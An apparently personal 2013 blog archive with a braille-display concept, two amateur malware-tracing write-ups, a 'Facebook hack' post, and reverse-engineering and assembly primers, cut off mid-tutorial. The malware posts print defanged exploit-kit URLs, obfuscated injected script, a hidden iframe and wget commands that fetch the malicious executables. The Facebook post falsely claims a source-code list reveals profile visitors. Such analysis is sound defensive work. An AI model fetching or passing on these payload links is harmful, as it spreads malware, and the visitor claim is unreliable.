Digital to braille..!!

Leave a comment

Heading sounds exciting.
There is a MIT’s event going to happen next week (8th of July 2013), I was planning to participate but unfortunately I was not be able to get in and so I wanted to everyone else to know what I was thinking since last 2-3 weeks.
I am not much a electronics guy and trying to learn electronics, So please do tell me my mistakes so that I may improve it.

This concept is just a concept which I haven’t demo it yet and was planning to create a prototype in the event but unfortunately not selected so trying to tell everyone so that I may have inputs form them and if someone like it then they may implement it.

Link to the event is here

I personally believe that there are not much of the good devices are in market which would give the realtime experience to the visually challenged people.

So this concept is to convert every digital media to the braille.
Best part of this is it is not just for english or something it would be able to all symbols and languages to braille.
Person readin the reader will have experience of reading the real book and not just books we may convert webpages and other digital media to braille.

There are not much pictures available but will try to provide you that within few days as I got no camera and no electronics which I may provide.

Constraints for present Prototype:
I am converting all the data to 1 particular font for present and I am keeping the size to tbe constant for every media.

Screen used: Something similar to magnetic slate thing which works on the principe of magnetic field.
Link to Magnetic slate

I have no idea how to do this so this is my next task to make this screen work something similar to that of kindle reader.
and increase the magnetic field by providing the power.(not sure how research in progress)
As my research says the E-ink technology works we may develop something similar with it as that of kindle screen which is a Ebook reader.

Let’s place this screen directly above a bread board, which got office pins in it.
Now as the image produce over the screen it will produce a magnetic filed which will pull the office pins towards it.
As we all know that magnetic force would be vectorial in nature, for those who don’t read it from here http://hyperphysics.phy-astr.gsu.edu/hbase/magnetic/magfor.html
Now those pins which are directly below the screen will pull those pins towards it and the pins which are not directly below will face the force component in some specific degree so it won’t be pulled up that much as that of the pins directly below the symbols (remember that symbols are magnetic)
Now time is mesure the distance with which the pins are up than.
This is all what I am sure about after that I an not sure about things

First

We may use the pins to trigger the circuit for the specific pattern and produce the content over the electronic braille screen or refreshable braille screen.

Second

We may trigger the circuit by measuring the moved screens from below the bread board and then to trigger the screen.

Advantages:
1) It is fast
2) Will convert the all those alphabets to braille which are shown in the screen.
3) will have the real feel of reading the book or watching the webpage in realtime.
For now the only constraint of font and size and I am not sure this really matters or not.

Different ideas which are kind of similar and this idea is inspired form them
1) A braille reader can read up to 200 words per minute
http://www.epokh.org/blog/?p=235
2) Zixel: A 2.5-D Graphical Tactile Display System
http://anirudh.me/2011/05/zixel-a-2-5-d-graphical-tactile-display-system/
3) World’s 1st Braille Smartphone for Blind People
http://updateszone.com/worlds-1st-braille-smartphone-for-blind-people-coming-soon/

Comments and views required.
Would love if someone feel like to implement this at there end and would love to extend this ūüôā

My work for autistic people is over my another blog, This was my 1st blog for Visually challenged people, Will post more updates over this work very soon.
Link to my another block
http://www.techautismandme.wordpress.com

Handling error 402: Payment Required with malicious domain #MMD

4 Comments

Link from where I started:

http://urlquery.net/report.php?id=1858750

And this link directed me to here:

h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/vSdOqASe.jar

Error 402 and payment Required .

Request URL:h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/vSdOqASe.jar
Request Method:GET
Status Code:402 Payment Required
Response Header
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length:0
Content-Type:text/html; charset=utf-8
Date:Mon, 08 Apr 2013 13:16:25 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

 

Suspicious isn’t it..

So I proceeded by getting in the sub directories of the server and it resulted in the link

h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL

Which automatically lead to a blank webpage.

Response for h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/pdfx.html

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length:817
Content-Type:text/html;charset=utf-8
Date:Mon, 08 Apr 2013 15:49:50 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

Response for “h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/zmiohek.html”

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding:gzip
Content-Length:1676
Content-Type:text/html;charset=utf-8
Date:Mon, 08 Apr 2013 15:49:51 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

 

When I tried to analysed its source then find out a variable storing the web address.

<script>
var icEVKt;
var Owsfe;CvkiFV='RHaLS';if (CvkiFV=='Yiwvd') vPUR='CnYEdy';
var XXwVKa="h00p://xfecajsmipichbex[dot]in/dkCSD30yLXI0ANWV0N3ab0JYAK0i1gr0xpz10m3aM0kkMd0odNL0RERP17ZDG16mRL0N8KM0XG9d0S0XG0GzNV05JZ10HrMA02rUm0AUgY0kQdn11pUL0qQQt0DZQ012fm611kpG0FebV0oNUn08f3o0gxYY0MaW413LKv03FP40Er9118am10Jld80lyyk11HiD0gmv2/TL7vbliVHL.exe?IUABFhcBXOgtL0ce=m&h=32";
</script>

now use

wget –save-headers -d h00p://xfecajsmipichbex[dot]in/dkCSD30yLXI0ANWV0N3ab0JYAK0i1gr0xpz10m3aM0kkMd0odNL0RERP17ZDG16mRL0N8KM0XG9d0S0XG0GzNV05JZ10HrMA02rUm0AUgY0kQdn11pUL0qQQt0DZQ012fm611kpG0FebV0oNUn08f3o0gxYY0MaW413LKv03FP40Er9118am10Jld80lyyk11HiD0gmv2/TL7vbliVHL.exe?IUABFhcBXOgtL0ce=m&h=32

-d for debugging and –save-headers for saving the headers.

Or

Simply paste this in your browser to download the exe ūüėČ

Now this is the Analysis Report of this file using Virus total and it says 8/45

https://www.virustotal.com/en/file/cb92c51ba26391eae67d85b968b61a71e33cea4a82894f10fa6777ae9938e7e8/analysis/

Anubis Report for this exe

http://anubis.iseclab.org/?action=result&task_id=1956ca7159064b544fd05dd3c6c72cd5e&format=pdf

Dig Report

dig XFECAJSMIPICHBEX.IN ANY
; <<>> DiG 9.8.3-P1 <<>> XFECAJSMIPICHBEX.IN ANY
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5853
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;XFECAJSMIPICHBEX.IN. IN ANY
;; ANSWER SECTION:
XFECAJSMIPICHBEX.IN. 28800 IN A 192.210.150.43
XFECAJSMIPICHBEX.IN. 7200 IN SOA erdomain.mercury.orderbox-dns.com. founderapi.email.com. 2013040403 7200 7200 172800 38400
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.mars.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.venus.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.mercury.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.earth.orderbox-dns.com.
;; Query time: 401 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Tue Apr 9 11:42:38 2013
;; MSG SIZE rcvd: 239

 

whois xfecajsmipichbex.in
Domain ID:D7196301-AFIN
Domain Name:XFECAJSMIPICHBEX.IN
Created On:04-Apr-2013 21:46:01 UTC
Last Updated On:04-Apr-2013 21:46:03 UTC
Expiration Date:04-Apr-2014 21:46:01 UTC
Sponsoring Registrar:Webiq Domains Solutions Pvt. Ltd. (R131-AFIN)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Status:ADDPERIOD
Registrant ID:WIQ_27213783
Registrant Name:founder api
Registrant Organization:N/A
Registrant Street1:foundap 4
Registrant City:new york
Registrant State/Province:New York
Registrant Postal Code:10006
Registrant Country:US
Registrant Phone:+1.5274563219
Registrant Email:founderapi@email.com

Domains hosted over Same IP Virus total report:
https://www.virustotal.com/en/ip-address/192.210.150.43/information/

 

If you check the WhoIs for every domain you will find the same credentials like phone number,

 

Screen shot for h00p://192.210.150.43/

                            

Screen shot for Geographical address locator.

According to the  http://wepawet.iseclab.org/view.php?hash=453609c244e3925ce0fe662a71eba0a8&t=1365501256&type=js

Code there are 2 PDF but able to download just 1 of those 2.

 

Pdf downloaded

TLfeaOwS.pdf

Header for page ‚Äúh00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/TLfeaOwS.pdf‚ÄĚ

 

PDF Data over browser:

 

%PDF-1.6 %ÔŅŬēÔŅĹ 18 0 obj <> endobj 6 0 obj <> endobj 22 0 obj <> endobj 8 0 obj <> stream 1.6511*pdf Piexnlaypa

endstream endobj 20 0 obj <> endobj 23 0 obj <> endobj 5 0 obj <> endobj 1 0 obj <> endobj 21 0 obj <> endobj 7 0 obj <> /XObject <<>>>> endobj 19 0 obj <> endobj xref 0 24 trailer <> startxref 802 %%EOF
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0</pre>
Content-Encoding:gzip
Content-Length:5531
Content-Type:text/html;charset=utf-8
Date:Tue, 09 Apr 2013 13:17:17 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

Virus total report for the pdf file

https://www.virustotal.com/en/file/e0be674422a6579361b0724da99eee4c9b33e137239a7268c530f1afea0c1b3d/analysis/1366874391/

Which confirm this as malicious.

Screen Shot 2013-04-25 at 4.47.15 PM

Snap Shot of all the files.

Every time you download the file it’s goign to give some random name to it.

 

#MalwareMustDie

Malicious robaina91.com analysis #MMD

2 Comments

we got the information of Bad guy from this link (http://urlquery.net/report.php?id=1906732)

Which FInally leads us to this (h00p://www.robaina91[dot]com/es/robaina-album.html) website.

This looks like some normal one but it is not (Though google Crome already told me about the site is malecious).

Let’s try to see the reply header

 

Accept-Ranges:bytes

Connection:close

Content-Length:30270

Content-Type:text/html

Date:Wed, 10 Apr 2013 10:45:33 GMT

ETag:”5e18278-763e-51f1a980″

Last-Modified:Fri, 01 Feb 2013 20:09:26 GMT

Server:Apache/2.2.3 (CentOS)

 

Looks like normal one indeed it is lets dig a little more ūüôā

 

On little analysis of this code I find out

<iframe src="h00p://allbestauto042[dot]ru/in.cgi?ftp" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;">

 

ok, Lets analyse this link  h00p://allbestauto042[dot]ru/in.cgi?ftp

The Header says

Request URL:h00p://allbestauto042[dot]ru/in.cgi?ftp

Request Method:GET

Status Code:302 Found

 

Query String Parametersview sourceview URL encoded

  1. ftp:

Response Headersview source

Connection:close

Content-Type:text/html; charset=UTF-8

Date:Thu, 11 Apr 2013 06:08:31 GMT

Location:http://google.com

Server:Apache/2.2.15 (CentOS)

Set-Cookie:vbpnxftp=_1_10000_; expires=Fri, 12-Apr-2013 06:08:31 GMT; path=/;domain=allbestauto042.ru

Set-Cookie:TSUSER=ftp; expires=Fri, 11-Apr-2014 06:08:31 GMT;path=/;domain=allbestauto042.ru

Transfer-Encoding:chunked

 

Why 302 and why is is redirecting and why not showing google IDK Please do tell me as I have no idea but this look suspecious.

After this it is loading 10 php file

h00p://newssearch006[dot]ru/flow01.php

 

Range from flow01-10

 

Lets dig a little more.

Request URL:h00p://promoution115[dot]ru/tds/in.cgi?default

Request Method:GET

Status Code:302 Found

 

Response header

Connection:close

Content-Type:text/html; charset=UTF-8

Date:Thu, 11 Apr 2013 06:14:46 GMT

Location:http://www.google.com

Server:Apache/2.2.15 (CentOS)

Set-Cookie:vbpnxdefault=_10_0_20_; expires=Fri, 12-Apr-2013 06:14:46 GMT; path=/; domain=promoution115.ru

Set-Cookie:vbpnx2=_0_98_102_48_35_58_88_; expires=Fri, 12-Apr-2013 06:14:46 GMT; path=/; domain=promoution115.ru

Transfer-Encoding:chunked

 

Again redirecting.

 

After digging a little more I came across

 

‚Äúh00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/pdfx.html‚ÄĚ

and

‚Äúh00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/exvft.html‚ÄĚ

 

This ask me to use JAVA as I don’t know the website so I never give permission but this means I am on track and close to my target.

So let’s dig a little more.

 

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Content-Encoding:gzip

Content-Length:735

Content-Type:text/html;charset=utf-8

Date:Thu, 11 Apr 2013 04:17:33 GMT

Expires:Thu, 19 Nov 1981 08:52:00 GMT

Pragma:no-cache

Server:nginx/0.7.64

X-Mode:HTML

X-Powered-By:ASP.NET version 4

X-Powered-By:HPHP

 

Let’s take a look in it’s code

 

<script></p>
<p dir="ltr">ZNtS='UVne';if (ZNtS=='NYhMNY') RQvjqh();function RfTuWD(){}function omjcz(){}var PMispi=219;TbtOk='iCUcc';if (TbtOk=='xsPS') eHaPAj='PWcK';</p>
<p dir="ltr">var TgPZN='YxGr';function zuWU(){var PjSQr='LEBk';kGuff='kVcVPJ';if (kGuff=='DgDnT') jCdMP();}FOgl='mNgzp';if (FOgl=='FdLFVa') wJkyeL='nyLce';</p>
<p dir="ltr">var kdXJWSBiW="h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA";</p>
<p dir="ltr"></script>

 

Isn’t this suspecious..??

 

h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA

Let’s see another file now and this end up with

 

RequestURL:h00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/exvft.html

Request Method:GET

Status Code:200 OK

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Content-Encoding:gzip

Content-Length:1701

Content-Type:text/html;charset=utf-8

Date:Thu, 11 Apr 2013 12:04:24 GMT

Expires:Thu, 19 Nov 1981 08:52:00 GMT

Pragma:no-cache

Server:nginx/0.7.64

X-Mode:HTML

X-Powered-By:ASP.NET version 4

X-Powered-By:HPHP

<input type="text" id="bxpkr" value="78agb3aoadb2ajapao829ha1alahan9qad9haj8aada9aoabanaf8eb4abamb3af8eafb6aeabb7b18bb978b4abb082afb6aeabb2af93aoafb5829aabb2af8a8b9178afb6aeabb2af8gb1afb29aabb2af8aafb6aeabb2af8gahafb29aabb2af8a8b828d82afb6aeabb7b18b9178b4abb082ada9b4abamb3af93afb1adabaqaf8ab4abamb3af8b828d828a8aafb6aeabb7b19393aob3amam8b8295828484829082849182afb6aqajb0afb193848dafb6aeabb2af8gb2ap9r9q999pb2b0ajaoah8a8b8b9178aeapadb3anafaob28gadapapalajaf93ada9aoabanaf828d82849384828d82ada9b4abamb3af9178bb78b4abb082ai9laqb7ak9aabam829382aoabb4ajahabb2apb08gb3b1afb097ahafaob28gb2ap9iapb5afb099abb1af8a8b9178ajag8aai9laqb7ak9aabam8gajaoaeafb69lag8a84b5apb58o8m848b928i82888882ai9laqb7ak9aabam8gajaoaeafb69lag8a84anb1ajaf848b94938i8bb9789ha1alahan9qad9haj8a84ag9d9dai9qabb1aeabb1848e82alaea29ga19p98aja18d8488ai938l8k848e828j8b9178aeapadb3anafaob28gb5b0ajb2af8a8492ajagb0abanaf82agb0abanafacapb0aeafb093898i8982b1adb0apamamajaoah9389aoap8982b1b2b7amaf9389aqapb1ajb2ajapao90abacb1apamb3b2af91b2apaq908iaqb691amafagb2908iaqb6918982b1b0ad9389agaob2b18gaib2anam8994928hajagb0abanaf94848b9178bb78b4abb0829paqamajb29kb3an93agb3aoadb2ajapao8ab1b2b08bb978b4abb082b0afb293a5a79178b4abb082b1aqam93b1b2b08gb1aqamajb28a8ha5a68ga6a98e8fa78hah8b9178agapb08aaj938i91aj928m91aj8d8d8bb978ajag8ab2b7aqafapag82b1aqama5aja7839384b3aoaeafagajaoafae848bb9b0afb2a5aja793b1aqama5aja791bbafamb1afb9b0afb2a5aja793848i8491bb78bb78b0afb2b3b0ao82b0afb28gakapajao8a84848b9178bb9178b4abb0829dafb29kb3an93agb3aoadb2ajapao8ab1b2b08bb978b2b0b7b978b0afb2b3b0ao829paqamajb29kb3an8ab1b2b08ganabb2adai8a8ha5a6aea7a5a6aea68ga6a98e8fa78c8h8b8gakapajao8a84848b8b78bbadabb2adai8aad8bb9bb9178b0afb2b3b0ao8284849178bb9178b4abb0829dafb29maeaga0afb0b1ajapao93agb3aoadb2ajapao8a8bb978ajag8aaoabb4ajahabb2apb08gaqamb3ahajaob182888882aoabb4ajahabb2apb08gaqamb3ahajaob18gamafaoahb2ai948i8bb978b4abb082aqamb3ahajao9kabanaf829382aoabb4ajahabb2apb08gaqamb3ahajaob1a58497aeapacaf8297adb0apacabb284a79178ajag8a83aqamb3ahajao9kabanaf8b82b0afb2b3b0ao8284849178b4abb082aqaeaga9b4afb0a9b4afb0b1ajapao939dafb29kb3an8aaqamb3ahajao9kabanaf8gb4afb0b1ajapao8b9178b4abb082aqaeaga9b4afb0a9aeafb1adb0ajaqb2ajapao939dafb29kb3an8aaqamb3ahajao9kabanaf8gaeafb1adb0ajaqb2ajapao8b9178b4abb082aqaeaga9b4afb0a9anajanaf9384849178ajag8aaoabb4ajahabb2apb08ganajanaf9qb7aqafb1a584abaqaqamajadabb2ajapao8hb4aoae8gabaeapacaf8gaqaeagb6anam84a78bb9aqaeaga9b4afb0a9anajanaf93848r8g8i8g8i8g8i8491bbafamb1afb9ajag8aaoabb4ajahabb2apb08ganajanaf9qb7aqafb1a584abaqaqamajadabb2ajapao8hb4aoae8gabaeapacaf8gb68fanabb0b184a78bb9aqaeaga9b4afb0a9anajanaf93848q8g8i8g8i8g8i8491bbbb9178ajag8aaqaeaga9b4afb0a9b4afb0b1ajapao839384848bb978b0afb2b3b0ao82aqaeaga9b4afb0a9b4afb0b1ajapao9178bb78afamb1af82ajag8aaqaeaga9b4afb0a9aeafb1adb0ajaqb2ajapao839384848bb978b0afb2b3b0ao82aqaeaga9b4afb0a9aeafb1adb0ajaqb2ajapao829178bb78afamb1af82b978b0afb2b3b0ao829dafb29kb3an8aaqaeaga9b4afb0a9anajanaf8b9178bb78bbafamb1afb978b4abb082aeajb4a9apacak829382aeapadb3anafaob28gadb0afabb2af9bamafanafaob28a84aeajb4848b9178aeapadb3anafaob28gacapaeb78gabaqaqafaoae99aiajamae8aaeajb4a9apacak8b9178aeajb4a9apacak8gajaoaoafb09e9q9j9i82938289929l989g9b999q82ajae829382849maeag9mamb3ah9lacak8482aoabanaf93849maeag9mamb3ah9lacak8482999i979p9p9f9a9384adamb1ajae9099978q978r8p8q8i8f8k8q8i9a8f8j8j999c8f978k8m9a8f8m8m8m8n8n8l8n8m8i8i8i8i8482a19f9a9q9e93848i84829e9b9f9d9e9q93848i8494928h9l989g9b999q94899178b2b0b7b978b0afb2b3b0ao829dafb29kb3an8a9maeag9mamb3ah9lacak8g9dafb2a0afb0b1ajapaob18a8b8b9178bbadabb2adai8aad8bb9b0afb2b3b0ao82848491bb9178bb78bb78aqaeagb4afb08293829dafb29maeaga0afb0b1ajapao8a8b9178ajag8aaqaeagb4afb0839384848b78aqaeagb4afb093aqabb0b1af9faob28aaqaeagb4afb08b9178afamb1af82aqaeagb4afb0938i9178agb3aoadb2ajapao829canb1b7al8a8b82b978b4abb082b3ab829382aoabb4ajahabb2apb08gb3b1afb097ahafaob28gb2ap9iapb5afb099abb1af8a8b9178ajag828ab3ab8gajaoaeafb69lag8a84b5ajao848b94938i8b82b0afb2b3b0ao828j9178b0afb2b3b0ao828i9178bb78agb3aoadb2ajapao829n9k9oabb7agb88a8bb978ajag8aaoabb4ajahabb2apb08gb3b1afb097ahafaob28gajaoaeafb69lag8a8499aib0apanaf848b94938i8b82b0afb2b3b0ao828j9178b0afb2b3b0ao828i9178bb78agb3aoadb2ajapao82b29ib59aak9b9a9lac8aarapa499ak8b82b978b4abb082aqajagb0829382aeapadb3anafaob28gadb0afabb2af9bamafanafaob28a84ajag848d84b0ab848d84anaf848b9178aqajagb08gb1afb297b2b2b0ajacb3b2af8a89b5ajaeb2ai898e828j8i8b9178aqajagb08gb1afb297b2b2b0ajacb3b2af8a89aiafajahaib2898e828j8l8b9178aqajagb08gb1afb297b2b2b0ajacb3b2af8a89b1b2b7amaf898e8284b2apaq908j8i8iaqb691aqapb1ajb2ajapao90abacb1apamb3b2af848b9178aqajagb08gb1afb297b2b2b0ajacb3b2af8a89b1b0ad898e82arapa499ak8b9178aeapadb3anafaob28gacapaeb78gabaqaqafaoae99aiajamae8aaqajagb08b9178bb78ajag828a9canb1b7al8a8b82888882839n9k9oabb7agb88a8b8b82b978ajag828a8aaqaeagb4afb094938q8i8i8i82888882aqaeagb4afb092938q8k8i8i8b82baba828aaqaeagb4afb094938r8i8i8i82888882aqaeagb4afb092938r8l8i8i8b8b78b29ib59aak9b9a9lac8a84979banapal9p9c8gaqaeag848b9178ajag828aaqaeagb4afb0829493828o8i8i8i82888882aqaeagb4afb08292828q8i8i8i8b78b29ib59aak9b9a9lac8a84b5ar9999akan8gaqaeag848b9178ajag828a838a8aaqaeagb4afb094938q8i8i8i82888882aqaeagb4afb092938q8k8i8i8b82baba828aaqaeagb4afb094938r8i8i8i82888882aqaeagb4afb092938r8l8i8i8b8b82888882838aaqaeagb4afb0829493828o8i8i8i82888882aqaeagb4afb08292828q8i8i8i8b8b78b1afb29qajanafapb3b28a84aeapadb3anafaob28gb5b0ajb2af8a8992ajagb0abanaf82b1b2b7amaf93a684b2apaq908j8i8iaqb691aqapb1ajb2ajapao90abacb1apamb3b2afa68482b1b0ad93a684akapb4ag8gaib2anama68494928hajagb0abanaf94898b848e8l8i8i8i8b9178bb78">

 

So a text area with some random text…

 

Nothing much. Let‚Äôs get back and analyse that file which we got from the javascipt ūüôā

 

<script>

ZNtS='UVne';if (ZNtS=='NYhMNY') RQvjqh();function RfTuWD(){}function omjcz(){}var PMispi=219;TbtOk='iCUcc';if (TbtOk=='xsPS') eHaPAj='PWcK';</p>
<p dir="ltr">var TgPZN='YxGr';function zuWU(){var PjSQr='LEBk';kGuff='kVcVPJ';if (kGuff=='DgDnT') jCdMP();}FOgl='mNgzp';if (FOgl=='FdLFVa') wJkyeL='nyLce';</p>
<p dir="ltr">var kdXJWSBiW="h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA";

</script>

 

the new script and there we got what we really wanted ūüôā

 

‚Äúh00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA‚ÄĚ

 

The real malware what we always wanted to have ūüôā

 

wget –save-header h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA

 

Download this file and let’s see its reports

1

Virus total report

https://www.virustotal.com/en/file/09d4986243951c6eafd4b715dd6b01a3a08e56dc61528387a914115f304b5583/analysis/1365682386/

 

Anubis report

http://anubis.iseclab.org/?action=result&task_id=106d9fecea32c098409aa191b7f285fd4&format=pdf

 

So malware confirmed.

 

In the process of analysis I came across ‚Äúh00p://golf2day[dot]com/wnqe.html‚ÄĚ but I am not be able to confirm why it is malecious or being declared¬†malicious¬†by browser as it was be asking for some ID pass and creating a secure connection.

 

Anyhow let’s see the domain and whois of this domain

whois 3d-game.com

  Domain Name: 3D-GAME.COM

  Registrar: DNC HOLDINGS, INC.

  Whois Server: whois.directnic.com

  Referral URL: http://www.directnic.com

  Name Server: NS1.DTDNS.COM

  Name Server: NS2.DTDNS.COM

  Name Server: NS3.DTDNS.COM

  Status: clientDeleteProhibited

  Status: clientTransferProhibited

  Status: clientUpdateProhibited

  Updated Date: 03-oct-2012

  Creation Date: 13-apr-2003

  Expiration Date: 13-apr-2014

Registrant:North Loop Networks

1807 3rd st ne

Minneapolis, MN 55418

US

612 385 5501

Domain Name: 3D-GAME.COM

 

Administrative Contact:

Manager, Hostmaster hostmaster@northloopnetworks.com

1807 3rd st ne

Minneapolis, MN 55418

US

612 385 5501

Technical Contact:Manager, Hostmaster hostmaster@northloopnetworks.com

1807 3rd st ne

Minneapolis, MN 55418

US

612 385 5501

Record last updated 03-02-2011 12:39:17 PM

Record expires on 04-13-2014

Record created on 04-13-2003

 Domain servers in listed order:

NS1.DTDNS.COM 64.156.29.49

NS2.DTDNS.COM 67.228.106.194

NS3.DTDNS.COM 75.126.80.224


#MalwareMustDie

Facebook Hack, Who visited your profile.

2 Comments

It’s a simple Facebook Hack nothing like some Privacy leak or something so I am not expecting any¬†Death threats, Because of this. If you are still interested in sending some of those then send me over my personal ID not over my official one ūüėČ

You Don’t have to give nay¬†permission¬†or to install anything, simply just try this over your browser and nothing like information leak. It just got 5 very simple steps.
1) Log in to your Facebook: I hope this is something very simple and need no explanation.

2) View Source or use this link “view-source:www.facebook.com” : this is something very simple, if not simple then go to your facebook right click and view source code.

3)Search for “InitialChatFriendsList” : After going in your source code prss (ctrl+f) and search this string.
4)Right after this keyword you will see {“list”[“1111111111″,”2222222222″,…,”9999999999”]} : You going to see a string like this just after what you have searched and that will be having some random numbers.

5)Replace X with Id to view the person profile www.facebook.com/XXXXXXXXXX and see the person who visited your profile.

I hope this is pretty Simple, Post your comments.

 

Regards

Unknown_had

What reverse engineering is? (Pure theory)

Leave a comment

This post is for those who don’t know what reverse engineering means.

I am not going to discuss some thing technical as in some disassembly tol or some debugger will just try to tell the young audience what reversing is.

Reverse engineering as the name specifies it’s something like starting from the very end and then¬†finishing on the very start.

This sounds kind of confusing?

Let me to explain using ¬†some better examples it’s a process of getting code form some binary.

 

As there are a lot of closed source binaries available in market and some of them are malicious too so here we feel the need of reversing some particular binary.

Consider example of some malware as we got no code for that and we need to study how malware works to know it’s internal features and what kind of things it’s doing to my machine in that case we have to cut the malware into 2 half ūüėČ (Kidding)

We have to reverse that malware.

So mostly there are two kind of ways by which we fo this

1) Dynamic analysis

2)Static analysis

Dynamic analysis is Analysis of the sample using some Debugger or some random tools while it’s getting executed over the system. If we are not sure about the sample then better to use some VM for this as that is going to help you protected and not to ruin the data over your machine.

Static Analysis is about simply reversing the sample and then to analyse the code.

Now here Come the Assembly thing as I have already taught the basics of assembly in my previous tutorial so this is going to be fun now as this own;t lok like some MATRIX and stuff ūüôā

When you attach a running process with some Debugger or some Decompiler then it is not be able to provide the native code  (The original code in which the ample is written) it use to analyse it and to dump the assembly and for that we should know assebmly and other things

In the next¬†Tutorials¬†we going to need Olley debugger as will start with a simple crack me non¬†malicious¬†file and will carry forward the other things and a s the things proceed will try to train you from Noob to PRO ūüôā

Ask any question over comment or mail me.

Do tell me if you find something which is wrong.

Thanks for reading.

 

Assembly Tutorial for Reverse engineering basics.

10 Comments

Introduction

I have learned assembly mostly from reading various tutorials online, reading books, and ask questions in newsgroups and IRC.
This tutorial will focus on x86 assembly. Which going to help you further in reverse engineering tutorials which I will be releasing after this.

Knowledge of higher level programming languages and basic knowledge of computer architecture is assumed.

Why assembly ?

Because when we are going to reverse any binary the code which we going to get will be in assembly.

Who use assembly? 

I don’t know. If you know then do share that with me as according to me now you for higher level languages like C,c++ and a ton¬†of other language then why to use assembly.

Though Assembly generation process is automated then there might be some where we might need handwritten assembly code.

Positive and negative of assembly:

Positive is very fast, it’s powerful and small.

Negatives are Hardware dependent, not easy to debug and consume too much of time then High level languages.

Assemblers

Assembler is used to convert Assembly to machine language.
Often, it will come with a linker that links the assembled files and produces an
executable from it. Windows executables have the .exe extension. Here are some of the
popular ones:

1. MASM ‚Äď This is the assembler this tutorial is geared towards, and you should
use this while going through this tutorial. Originally by Microsoft, it’s now
